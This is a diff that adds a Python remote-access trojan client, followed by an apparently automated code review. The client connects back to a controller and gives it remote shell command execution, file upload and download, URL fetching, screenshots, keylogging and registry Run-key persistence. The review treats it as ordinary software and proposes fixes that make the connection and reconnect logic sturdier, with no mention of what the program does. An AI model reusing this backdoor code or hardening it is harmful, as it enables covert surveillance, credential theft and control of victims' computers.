1
+ import socket
2
+ import json
3
+ import subprocess
4
+ import time
5
+ import os
6
+ import pyautogui #dependency # pip install pyautogui #mss is faster alternative
7
+ import keylogger
8
+ import threading
9
+ import shutil
10
+ import sys
11
+ import requests
12
+ from sys import platform
13
+
14
+ def reliable_send (data ):
15
+ jsondata = json .dumps (data )
16
+ s .send (jsondata .encode ())
17
+
18
+ def reliable_recv ():
19
+ data = ''
20
+ while True :
21
+ try :
22
+ data = data + s .recv (1024 ).decode ().rstrip ()
23
+ return json .loads (data )
24
+ except ValueError :
25
+ continue
26
+
27
+ def download_file (file_name ):
28
+ f = open (file_name , 'wb' )
29
+ s .settimeout (2 )
30
+ chunk = s .recv (1024 )
31
+ while chunk :
32
+ f .write (chunk )
33
+ try :
34
+ chunk = s .recv (1024 )
35
+ except socket .timeout as e :
36
+ break
37
+ s .settimeout (None )
38
+ f .close ()
39
+
40
+ def upload_file (file_name ):
41
+ f = open (file_name , 'rb' )
42
+ s .send (f .read ())
43
+
44
+ def download_url (url ):
45
+ get_response = requests .get (url )
46
+ file_name = url .split ('/' )[- 1 ]
47
+ with open (file_name , 'wb' ) as out_file :
48
+ out_file .write (get_response .content )
49
+
50
+ def screenshot ():
51
+ myScreenshot = pyautogui .screenshot ()
52
+ myScreenshot .save ('.screen.png' )
53
+
54
+ def persist (reg_name , copy_name ):
55
+ file_location = os .environ ['appdata' ] + '\\ ' + copy_name
56
+ try :
57
+ if not os .path .exists (file_location ):
58
+ shutil .copyfile (sys .executable , file_location )
59
+ subprocess .call ('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"' , shell = True )
60
+ reliable_send ('[+] Created Persistence With Reg Key: ' + reg_name )
61
+ else :
62
+ reliable_send ('[+] Persistence Already Exists' )
63
+ except :
64
+ reliable_send ('[-] Error Creating Persistence With The Target Machine' )
65
+
66
+ def is_admin ():
67
+ global admin
68
+ if platform == 'win32' :
69
+ try :
70
+ temp = os .listdir (os .sep .join ([os .environ .get ('SystemRoot' , 'C:\windows' ), 'temp' ]))
71
+ except :
72
+ admin = '[!!] User Privileges!'
73
+ else :
74
+ admin = '[+] Administrator Privileges!'
75
+ elif platform == "linux" or platform == "linux2" or platform == "darwin" :
76
+ pass
77
+ #TO BE DONE
78
+
79
+ def shell ():
80
+ while True :
81
+ command = reliable_recv ()
82
+ if command == 'quit' :
83
+ break
84
+ elif command == 'background' : #BEGIN
85
+ pass
86
+ elif command == 'help' : #ideally to be removed
87
+ pass
88
+ elif command == 'clear' :
89
+ pass #END
90
+ elif command [:3 ] == 'cd ' :
91
+ os .chdir (command [3 :])
92
+ elif command [:6 ] == 'upload' :
93
+ download_file (command [7 :])
94
+ elif command [:8 ] == 'download' :
95
+ upload_file (command [9 :])
96
+ elif command [:3 ] == 'get' :
97
+ try :
98
+ download_url (command [4 :])
99
+ reliable_send ('[+] Downloaded File From Specified URL!' )
100
+ except :
101
+ reliable_send ('[!!] Download Failed!' )
102
+ elif command [:10 ] == 'screenshot' :
103
+ screenshot ()
104
+ upload_file ('.screen.png' )
105
+ os .remove ('.screen.png' )
106
+ elif command [:12 ] == 'keylog_start' :
107
+ keylog = keylogger .Keylogger ()
108
+ t = threading .Thread (target = keylog .start )
109
+ t .start ()
110
+ reliable_send ('[+] Keylogger Started!' )
111
+ elif command [:11 ] == 'keylog_dump' :
112
+ logs = keylog .read_logs ()
113
+ reliable_send (logs )
114
+ elif command [:11 ] == 'keylog_stop' :
115
+ keylog .self_destruct ()
116
+ t .join ()
117
+ reliable_send ('[+] Keylogger Stopped!' )
118
+ elif command [:11 ] == 'persistence' :
119
+ reg_name , copy_name = command [12 :].split (' ' )
120
+ persist (reg_name , copy_name )
121
+ elif command [:7 ] == 'sendall' :
122
+ subprocess .Popen (command [8 :], shell = True , stdout = subprocess .PIPE , stderr = subprocess .PIPE , stdin = subprocess .PIPE )
123
+ elif command [:5 ] == 'check' :
124
+ try :
125
+ is_admin ()
126
+ reliable_send (admin + ' platform: ' + platform )
127
+ except :
128
+ reliable_send ('Cannot Perform Privilege Check! Platform: ' + platform )
129
+ elif command [:5 ] == 'start' :
130
+ try :
131
+ subprocess .Popen (command [6 :], shell = True )
132
+ reliable_send ('[+] Started!' )
133
+ except :
134
+ reliable_send ('[-] Failed to start!' )
135
+ else :
136
+ execute = subprocess .Popen (command , shell = True , stdout = subprocess .PIPE , stderr = subprocess .PIPE ,stdin = subprocess .PIPE )
137
+ result = execute .stdout .read () + execute .stderr .read ()
138
+ result = result .decode ()
139
+ reliable_send (result )
140
+
141
+ def connection ():
142
+ while True :
143
+ time .sleep (5 )
144
+ try :
145
+ s .connect (('127.0.0.1' , 5555 ))
146
+ # if platform == 'win32': #TO BE DONE
147
+ # persist(reg_name, copy_name)
148
+ shell ()
149
+ s .close ()
150
+ break
151
+ except :
152
+ connection ()
153
+
154
+ s = socket .socket (socket .AF_INET , socket .SOCK_STREAM )
155
+ connection ()
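Review bot: `reliable_recv` never detects a closed connection — when the peer goes away `s.recv` returns `b''`, `json.loads('')` raises `ValueError`, and the `continue` turns the loop into a busy spin at 100% CPU, while `connection()` compounds this by recursing from its bare `except:` and re-calling `s.connect` on the same module-level socket that is already connected or has already failed, so any exception escaping a command handler (for example `cd` into a missing directory, or `keylog_dump` before `keylog_start`, where `keylog` is unbound) leaves the client wedged in a reconnect loop that cannot succeed and eventually dies with `RecursionError`. The framing is also not reliable in the sense the name suggests: `reliable_send` uses `s.send` (partial writes are possible; `s.sendall` is the safe call) and there is no message delimiter, so two JSON messages landing in one `recv` can never parse. I would at least raise on EOF in `reliable_recv`, replace the recursion in `connection()` with a loop that builds a fresh socket per attempt and closes the old one, and note that `requests.get(url)` in `download_url` has no `timeout` and will block forever on a stalled server.
```python
def reliable_recv():
    data = ''
    while True:
        chunk = s.recv(1024)
        if not chunk:
            # EOF: the peer closed the socket; spinning on ValueError would never end.
            raise ConnectionError('connection closed by peer')
        data += chunk.decode().rstrip()
        try:
            return json.loads(data)
        except ValueError:
            continue

# … unchanged: download_file, upload_file, download_url, screenshot, persist, is_admin, shell …

def connection():
    global s
    while True:
        time.sleep(5)
        # A fresh socket per attempt: a socket that already connected or failed cannot be reused.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect(('127.0.0.1', 5555))
            shell()
            s.close()
            break
        except Exception:
            # Loop rather than recurse: unbounded recursion ends in RecursionError.
            s.close()
```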